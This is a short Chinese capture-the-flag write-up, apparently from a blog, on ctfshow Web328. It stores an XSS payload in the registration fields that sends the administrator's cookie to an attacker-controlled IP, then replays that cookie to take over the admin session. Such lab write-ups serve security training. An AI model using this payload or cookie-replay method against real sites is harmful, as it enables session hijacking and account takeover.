ctfshow(328)--XSS漏洞--存储型XSS

Web328

简单阅读一下页面。

是一个登录系统,存在一个用户管理数据库。

那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。

思路

我们向数据库中写入盗取管理员Cookie的恶意代码,然后利用管理员Cookie跳过账号密码验证,直接登录管理员界面即可。

在注册页面,把script、body、svg、img标签都试一下,看看哪个能成功获取到Cookie。

最后使用script标签成功了。

账号和密码都输入下面的payload:

php 复制代码
<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

然后在登录界面登录一下,就会发现自己服务器获取到了管理员的cookie

这时候我们访问用户管理界面并抓包,将自己的Cookie修改为管理员的Cookie,页面会显示 欢迎你,admin

但是此时下面的用户名和密码还没有出现。我们需要继续抓包,发现又会抓到一个关于下面内容的包,将这个包的Cookie也改为管理员Cookie,我们才能成功获取flag。
得到flag。

这里的管理员cookie更换的频率挺快的,能不能登录有点看运气,不知道有没有更稳定的方法/

相关推荐
hepherd8 分钟前
Flask学习笔记 - 模板渲染
前端·flask
LaoZhangAI8 分钟前
【2025最新】Manus邀请码免费获取完全指南:5种稳定渠道+3个隐藏方法
前端
经常见9 分钟前
浅拷贝与深拷贝
前端
前端飞天猪14 分钟前
学习笔记:三行命令,免费申请https加密证书📃
前端
关二哥拉二胡16 分钟前
前端的 AI 应用开发系列二:手把手揭秘 RAG
前端·面试
斯~内克17 分钟前
前端图片加载性能优化全攻略:并发限制、预加载、懒加载与错误恢复策略
前端·性能优化
奇怪的知识又增长了26 分钟前
Command SwiftCompile failed with a nonzero exit code Command SwiftGeneratePch em
前端
Maofu26 分钟前
从React项目 迁移到 Solid项目的踩坑记录
前端
薄荷味26 分钟前
ubuntu 服务器安装 docker
前端
Carlos_sam27 分钟前
OpenLayers:如何控制Overlay的层级?
前端·javascript